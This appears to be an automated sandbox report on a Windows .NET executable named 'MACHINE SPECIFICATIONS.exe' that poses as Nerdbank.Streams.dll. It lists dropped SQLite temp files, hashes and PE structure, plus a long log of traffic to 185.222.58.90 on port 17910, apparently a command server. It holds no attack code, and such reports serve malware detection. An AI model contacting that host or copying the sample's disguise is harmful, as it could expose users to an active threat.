SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDD5A.tmp

Download File

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF565.tmp

Download File

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF822.tmp

Download File

Process:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.079887361939601
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	MACHINE SPECIFICATIONS.exe
File size:	984576
MD5:	1ac0e9eee0868534cfca46127f5d5753
SHA1:	69b9f3a1be891e82a3a0b2d0286da36ea2b1c9ef
SHA256:	e7913058bbde80f5b9088b0b41a132b0d9c09e1973f9bf2199d355cf7620bf12
SHA512:	5df20b8077ed15ee2d023eb01b3173a3319cf60002f0af6bff34ffab97a28e383bf57dd671577577786cde28845e0463e77367f6449a4c5bbd6c2c1ae7f725b9
SSDEEP:	24576:zyS6vb4J1YMrQqmwN5xVKgPMszC8BW1Hd4wdB:Ovb4SMcq9bfVPMszC8BW1H9dB
TLSH:	7D25B470354C4924EFAE2A39C3AFA6DD06754CA6DE678A0D36C73787D421E03B897316
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+R..........."...0......D........... ........@.. .......................`............`................................

File Icon


Icon Hash:	c49a0894909c6494

Static PE Info

General

Entrypoint:	0x4edef3
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x82522B87 [Thu Apr 14 19:46:15 2039 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xeddd0	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xee000	0x4050	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xede1a	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xebef9	0xec000	False	0.590860657773	data	7.09295269868	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xee000	0x4050	0x4200	False	0.442175662879	data	5.71010240264	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf4000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xee148	0x468	GLS_BINARY_LSB_FIRST
RT_ICON	0xee5b0	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 1134929317, next used block 44344484
RT_ICON	0xef658	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON	0xf1c00	0x30	data
RT_VERSION	0xf1c30	0x420	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright
Assembly Version	2.1.0.0
InternalName	Nerdbank.Streams.dll
FileVersion	2.1.37.12290
CompanyName	Andrew Arnott
Comments	Streams for full duplex in-proc communication, wrap a WebSocket, split a stream into multiple channels, etc.
ProductName	Nerdbank.Streams
ProductVersion	2.1.37+0230c2ab16
FileDescription	Nerdbank.Streams
OriginalFilename	Nerdbank.Streams.dll

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 25, 2022 15:07:41.669136047 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:07:41.691636086 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:41.691715956 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:07:41.897141933 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:07:42.112106085 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:42.251323938 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:07:42.408418894 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:42.922243118 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:42.973870993 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:42.973970890 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:07:50.312830925 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:07:50.408338070 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:50.423234940 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:50.423763990 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:07:50.514591932 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:52.078752041 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:52.078794003 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:52.078819036 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:52.078841925 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:07:52.078880072 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:07:52.078931093 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.414761066 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.416034937 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.438685894 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.438832045 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.501405954 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.506066084 CEST	17910	49758	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.506174088 CEST	49758	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.548837900 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.569540024 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.592467070 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.592581987 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.592685938 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.592780113 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.615549088 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.615602970 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.615622044 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.615880013 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.615935087 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.616059065 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.616074085 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.630207062 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.630239010 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.630440950 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.638535976 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.638778925 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.638803005 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.638931036 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.638971090 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.638999939 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.639070988 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.639199018 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.639478922 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.639672995 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.653153896 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.653218985 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.661350965 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.661401987 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.661628962 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.661895037 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.662096024 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.904148102 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.904438972 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.904845953 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.904875994 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.904905081 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.904983044 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.905038118 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.905077934 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.927289009 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.927344084 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.927519083 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.927584887 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.927628040 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.927659035 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.927716017 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:06.927951097 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.928108931 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.928416967 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.928736925 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.928989887 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.929127932 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.950361013 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:06.950402975 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.091969967 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.092412949 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.115283012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.115468979 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.115744114 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.115819931 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.116039038 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.116117954 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.116163969 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.116228104 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.116447926 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.116559029 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.116641045 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.116731882 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.117011070 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.117089987 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.138741016 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.138794899 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.139033079 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.139064074 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.139314890 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.139458895 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.139547110 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.139915943 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.140055895 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.140073061 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.140350103 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.140480042 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.140543938 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.140918016 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.140996933 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.141165018 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.141403913 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.141683102 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.141978025 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.142225027 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.142384052 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.161729097 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.161973000 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.162003040 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.162177086 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.162455082 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.162484884 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.162692070 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.162964106 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163204908 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163238049 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163487911 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163520098 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163544893 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163595915 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163625956 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163691998 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:07.163760900 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163875103 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163903952 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.163934946 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164016008 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164042950 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164155006 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164185047 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164211035 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164238930 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164267063 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164444923 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164470911 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164524078 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164716959 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164747000 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164796114 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164823055 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.164963007 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.165121078 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.165326118 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.165353060 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.165400982 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.165430069 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.165724039 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.165927887 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.166210890 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:07.186199903 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.083709002 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.085304022 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.108144999 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.128272057 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.128329039 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.128357887 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.128385067 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.128523111 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.128576994 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.128628969 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.128659010 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.128678083 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.128721952 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.128762007 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.128788948 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.128822088 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.132723093 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.132916927 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.133122921 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.133196115 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.133229971 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.133269072 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.133331060 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.133375883 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.133384943 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.133469105 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.133481979 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.133574963 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.133766890 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.133771896 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.134011030 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.134114981 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.134167910 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.134242058 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.134355068 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.134466887 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.134540081 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.134651899 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151155949 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151257038 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151276112 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.151335955 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151348114 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.151401043 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.151469946 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151496887 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151555061 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151570082 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.151598930 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:08.151644945 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151668072 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:08.151748896 CEST	49768	17910	192.168.2.4	185.222.58.90
